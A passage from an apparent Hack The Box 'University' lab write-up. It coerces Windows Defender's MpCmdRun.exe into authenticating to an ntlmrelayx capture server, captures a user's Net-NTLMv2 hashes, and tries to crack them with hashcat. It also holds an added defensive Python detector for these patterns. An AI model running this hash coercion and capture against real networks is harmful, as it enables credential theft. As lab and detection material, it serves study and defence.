NTLM Leak


Since lateral movement to the martin.t user was achieved without knowing the password, several techniques can be used to retrieve that user's NTLM hash.

The current system, ws-3.university.htb, is in an internal network (192.168.99.0/24) and therefore cannot reach Kali. However, I remember seeing the impacket package on the lab-2.university.htb host, which is in the same internal network. I can use impacket-ntlmrelayx there to mimic an SMB server.

root@LAB-2:~# ntlmrelayx.py -smb2support -ntlmchallenge 1122334455667788 -of ntlmrelayx
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Running in reflection mode
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
 
[*] Servers started, waiting for connections

Starting an arbitrary SMB server with impacket-ntlmrelayx

PS C:\Windows\system32> cmd /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 3 -File \\192.168.99.12\blahblah
cmd /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 3 -File \\192.168.99.12\blahblah
CmdTool: Failed with hr = 0x800106BA. Check C:\Users\Martin.T\AppData\Local\Temp\MpCmdRun.log for more information

Using the Windows Defender binary MpCmdRun.exe, I can ask it to scan a file on the SMB server I set up above. This makes Defender open an outbound SMB connection to that server, and the connection authenticates with the current user's credentials.

The relay attack itself failed, most likely because SMB message signing is enforced, but the inbound authentication was still captured, and it contains the credential hash.

root@LAB-2:~# ll
total 24
drwx------  3 root root 4096 Oct 31 23:23 ./
drwxr-xr-x 22 root root 4096 Sep 13 08:12 ../
lrwxrwxrwx  1 root root    9 Sep 14 03:48 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
drwxr-xr-x  3 root root 4096 Sep 13 11:11 .local/
-rw-r--r--  1 root root 1800 Oct 31 23:23 ntlmrelayx_ntlmv2
-rw-r--r--  1 root root  148 Aug 17  2015 .profile

ntlmrelayx_ntlmv2

root@LAB-2:~# cat ntlmrelayx_ntlmv2
Martin.T::UNIVERSITY:1122334455667788:9fb772857efc8c192d2a6b40d81a41c3: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
Martin.T::UNIVERSITY:1122334455667788:82d59d3b61a53ab5816372a60b8a2981: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
Martin.T::UNIVERSITY:1122334455667788:76aac59d3a150b9147b974e9b3242593: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

Those are Net-NTLMv2 hashes, each computed against the fixed server challenge 1122334455667788 that was set with -ntlmchallenge.
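As an added defender-side example (not part of the original writeup): a parser for the hashcat 5600 lines ntlmrelayx wrote above, which also flags the static 1122334455667788 challenge as a capture-server indicator, plus a check over process command lines for the MpCmdRun -File UNC pattern. The sample command lines and capture line are constructed, not taken from the lab.

```python
import re
from typing import Optional

# Challenge ntlmrelayx was started with above (-ntlmchallenge 1122334455667788).
# It is also the well-known default of Responder/ntlmrelayx, so an NTLM exchange
# carrying this exact server challenge points at a rogue capture server.
STATIC_CHALLENGE = "1122334455667788"

# hashcat mode 5600 line layout: USER::DOMAIN:SERVER_CHALLENGE:NTPROOFSTR:BLOB
NETNTLMV2_RE = re.compile(
    r"^(?P<user>[^:]+)::(?P<domain>[^:]*):(?P<challenge>[0-9a-fA-F]{16}):"
    r"(?P<ntproofstr>[0-9a-fA-F]{32}):(?P<blob>[0-9a-fA-F]+)$"
)

# MpCmdRun.exe told to scan a -File on a UNC path, the pattern shown on this page.
MPCMDRUN_UNC_RE = re.compile(
    r'MpCmdRun\.exe.*?-File\s+"?(?P<unc>\\\\[^\s"]+)', re.IGNORECASE
)


def parse_netntlmv2(line: str) -> Optional[dict]:
    """Split one captured Net-NTLMv2 line into its fields, or None if malformed."""
    m = NETNTLMV2_RE.match(line.strip())
    if not m:
        return None
    fields = m.groupdict()
    fields["static_challenge"] = fields["challenge"].lower() == STATIC_CHALLENGE
    return fields


def flag_mpcmdrun_unc(cmdline: str) -> Optional[str]:
    """Return the UNC target if a command line points MpCmdRun -File at a share, else None."""
    m = MPCMDRUN_UNC_RE.search(cmdline)
    return m.group("unc") if m else None


# Constructed sample data (not captured from the lab): a benign local scan, the
# UNC variant, and one Net-NTLMv2 line with a made-up NTProofStr and short blob.
SAMPLE_CMDLINES = [
    r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 1',
    r'cmd /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 3 -File \\192.168.99.12\blahblah',
]
SAMPLE_CAPTURE = (
    "Martin.T::UNIVERSITY:1122334455667788:"
    "00112233445566778899aabbccddeeff:0101000000000000deadbeef"
)

if __name__ == "__main__":
    for c in SAMPLE_CMDLINES:
        print("UNC scan target:", flag_mpcmdrun_unc(c))
    print(parse_netntlmv2(SAMPLE_CAPTURE))
```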

Password Cracking (Failed)


┌──(kali㉿kali)-[~/archive/htb/labs/university]
└─$ hashcat --show martin.t.hash
 
5600 | NetNTLMv2 | Network Protocol
 
 
┌──(kali㉿kali)-[~/archive/htb/labs/university]
└─$ hashcat -a 0 -m 5600 martin.t.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 3 digests; 3 unique digests, 3 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Watchdog: Temperature abort trigger set to 90c
 
Host memory required for this attack: 3 MB
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
Session..........: hashcat                                
Status...........: Exhausted
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: martin.t.hash
Time.Started.....: Thu Oct 31 21:25:55 2024 (9 secs)
Time.Estimated...: Thu Oct 31 21:26:04 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  5241.8 kH/s (1.65ms) @ Accel:1024 Loops:1 Thr:1 Vec:16
Recovered........: 0/3 (0.00%) Digests (total), 0/3 (0.00%) Digests (new), 0/3 (0.00%) Salts
Progress.........: 43033155/43033155 (100.00%)
Rejected.........: 0/43033155 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:2 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[216361726f6c796e] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 66%
 
Started: Thu Oct 31 21:25:54 2024
Stopped: Thu Oct 31 21:26:05 2024

hashcat exhausted rockyou.txt without recovering any of the three Net-NTLMv2 hashes.